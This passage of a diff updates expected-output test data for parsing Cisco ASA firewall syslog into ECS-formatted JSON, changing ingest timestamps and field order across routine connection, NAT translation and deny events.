CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)", "code": "302013", "kind": "event", @@ -4637,7 +4637,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363529500Z", + "ingested": "2021-12-14T14:36:23.392267571Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269", "code": "305011", "kind": "event", @@ -4716,7 +4716,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363534100Z", + "ingested": "2021-12-14T14:36:23.392267957Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)", "code": "302013", "kind": "event", @@ -4800,7 +4800,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363539300Z", + "ingested": "2021-12-14T14:36:23.392268339Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -4885,7 +4885,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363544500Z", + "ingested": "2021-12-14T14:36:23.392268746Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", @@ -4967,7 +4967,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363548400Z", + "ingested": "2021-12-14T14:36:23.392269258Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270", "code": "305011", "kind": "event", @@ -5046,7 +5046,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363553Z", + "ingested": "2021-12-14T14:36:23.392269650Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)", "code": "302013", "kind": "event", @@ -5129,7 +5129,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363558700Z", + "ingested": "2021-12-14T14:36:23.392270031Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271", "code": "305011", "kind": "event", @@ -5208,7 +5208,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363562600Z", + "ingested": "2021-12-14T14:36:23.392270420Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)", "code": "302013", "kind": "event", @@ -5292,7 +5292,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363567600Z", + "ingested": "2021-12-14T14:36:23.392270805Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -5378,7 +5378,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363571800Z", + "ingested": "2021-12-14T14:36:23.392271194Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs", "code": "302014", "kind": "event", @@ -5460,7 +5460,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363576300Z", + "ingested": "2021-12-14T14:36:23.392272037Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272", "code": "305011", "kind": "event", @@ -5539,7 +5539,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363580400Z", + "ingested": "2021-12-14T14:36:23.392272437Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)", "code": "302013", "kind": "event", @@ -5624,7 +5624,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363585300Z", + "ingested": "2021-12-14T14:36:23.392272904Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375", "code": "302016", "kind": "event", @@ -5706,7 +5706,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363590500Z", + "ingested": "2021-12-14T14:36:23.392273296Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273", "code": "305011", "kind": "event", @@ -5785,7 +5785,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363596800Z", + "ingested": "2021-12-14T14:36:23.392273739Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)", "code": "302013", "kind": "event", @@ -5810,22 +5810,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -5835,12 +5829,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363601500Z", + "ingested": "2021-12-14T14:36:23.392274178Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30", "code": "305012", "kind": "event", @@ -5854,7 +5851,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -5915,7 +5915,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363606100Z", + "ingested": "2021-12-14T14:36:23.392274558Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277", "code": "305011", "kind": "event", @@ -5994,7 +5994,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363610400Z", + "ingested": "2021-12-14T14:36:23.392274950Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)", "code": "302013", "kind": "event", @@ -6019,22 +6019,16 @@ } }, { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6044,12 +6038,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363614200Z", + "ingested": "2021-12-14T14:36:23.392275335Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30", "code": "305012", "kind": "event", @@ -6063,25 +6060,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6091,12 +6085,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363619200Z", + "ingested": "2021-12-14T14:36:23.392275877Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30", "code": "305012", "kind": "event", @@ -6110,25 +6107,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6138,12 +6132,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363623600Z", + "ingested": "2021-12-14T14:36:23.392276337Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30", "code": "305012", "kind": "event", @@ -6157,25 +6154,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6185,12 +6179,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363628100Z", + "ingested": "2021-12-14T14:36:23.392276720Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", @@ -6204,25 +6201,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6232,12 +6226,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363633300Z", + "ingested": "2021-12-14T14:36:23.392277117Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", @@ -6251,25 +6248,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6279,12 +6273,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363639600Z", + "ingested": "2021-12-14T14:36:23.392277514Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", @@ -6298,7 +6295,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -6362,7 +6362,7 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363645Z", + "ingested": "2021-12-14T14:36:23.392277910Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", @@ -6447,7 +6447,7 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:31:36.363650200Z", + "ingested": "2021-12-14T14:36:23.392278341Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", @@ -6529,7 +6529,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363653900Z", + "ingested": "2021-12-14T14:36:23.392278729Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278", "code": "305011", "kind": "event", @@ -6608,7 +6608,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363658600Z", + "ingested": "2021-12-14T14:36:23.392279121Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", @@ -6691,7 +6691,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.363664Z", + "ingested": "2021-12-14T14:36:23.392279530Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6772,7 +6772,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.363668300Z", + "ingested": "2021-12-14T14:36:23.392279924Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6853,7 +6853,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.363673400Z", + "ingested": "2021-12-14T14:36:23.392280312Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6934,7 +6934,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.363678600Z", + "ingested": "2021-12-14T14:36:23.392281299Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7015,7 +7015,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.363683100Z", + "ingested": "2021-12-14T14:36:23.392281722Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7096,7 +7096,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.363687500Z", + "ingested": "2021-12-14T14:36:23.392282105Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7177,7 +7177,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.363692300Z", + "ingested": "2021-12-14T14:36:23.392282489Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7258,7 +7258,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.363698500Z", + "ingested": "2021-12-14T14:36:23.392282870Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7339,7 +7339,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.363703100Z", + "ingested": "2021-12-14T14:36:23.392283254Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7420,7 +7420,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.363707100Z", + "ingested": "2021-12-14T14:36:23.392283793Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7501,7 +7501,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.363711Z", + "ingested": "2021-12-14T14:36:23.392284175Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7582,7 +7582,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.363716Z", + "ingested": "2021-12-14T14:36:23.392284554Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7663,7 +7663,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.363720800Z", + "ingested": "2021-12-14T14:36:23.392284937Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7744,7 +7744,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363725300Z", + "ingested": "2021-12-14T14:36:23.392285319Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", @@ -7823,7 +7823,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363729900Z", + "ingested": "2021-12-14T14:36:23.392285708Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", @@ -7906,7 +7906,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363734Z", + "ingested": "2021-12-14T14:36:23.392286159Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", @@ -7985,7 +7985,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363738Z", + "ingested": "2021-12-14T14:36:23.392286578Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8070,7 +8070,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363742800Z", + "ingested": "2021-12-14T14:36:23.392286982Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", @@ -8153,7 +8153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363748800Z", + "ingested": "2021-12-14T14:36:23.392287364Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8238,7 +8238,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:31:36.363753400Z", + "ingested": "2021-12-14T14:36:23.392287749Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", @@ -8320,7 +8320,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363758Z", + "ingested": "2021-12-14T14:36:23.392288129Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", @@ -8399,7 +8399,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363763Z", + "ingested": "2021-12-14T14:36:23.392288577Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", @@ -8482,7 +8482,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363769100Z", + "ingested": "2021-12-14T14:36:23.392288961Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", @@ -8561,7 +8561,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363773600Z", + "ingested": "2021-12-14T14:36:23.392289348Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", @@ -8647,7 +8647,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363778500Z", + "ingested": "2021-12-14T14:36:23.392289737Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", @@ -8729,7 +8729,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363783Z", + "ingested": "2021-12-14T14:36:23.392290123Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", @@ -8808,7 +8808,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363788200Z", + "ingested": "2021-12-14T14:36:23.392290526Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", @@ -8894,7 +8894,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363792700Z", + "ingested": "2021-12-14T14:36:23.392291075Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", @@ -8976,7 +8976,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363797800Z", + "ingested": "2021-12-14T14:36:23.392291467Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", @@ -9055,7 +9055,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363802900Z", + "ingested": "2021-12-14T14:36:23.392291849Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", @@ -9141,7 +9141,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363807400Z", + "ingested": "2021-12-14T14:36:23.392292239Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", @@ -9226,7 +9226,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363812200Z", + "ingested": "2021-12-14T14:36:23.392292750Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", @@ -9308,7 +9308,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363818300Z", + "ingested": "2021-12-14T14:36:23.392293140Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", @@ -9387,7 +9387,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363823700Z", + "ingested": "2021-12-14T14:36:23.392293526Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", @@ -9473,7 +9473,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:31:36.363828400Z", + "ingested": "2021-12-14T14:36:23.392293919Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", @@ -9555,7 +9555,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363832300Z", + "ingested": "2021-12-14T14:36:23.392294316Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", @@ -9634,7 +9634,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363836200Z", + "ingested": "2021-12-14T14:36:23.392294800Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", @@ -9717,7 +9717,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:31:36.363841200Z", + "ingested": "2021-12-14T14:36:23.392295581Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to 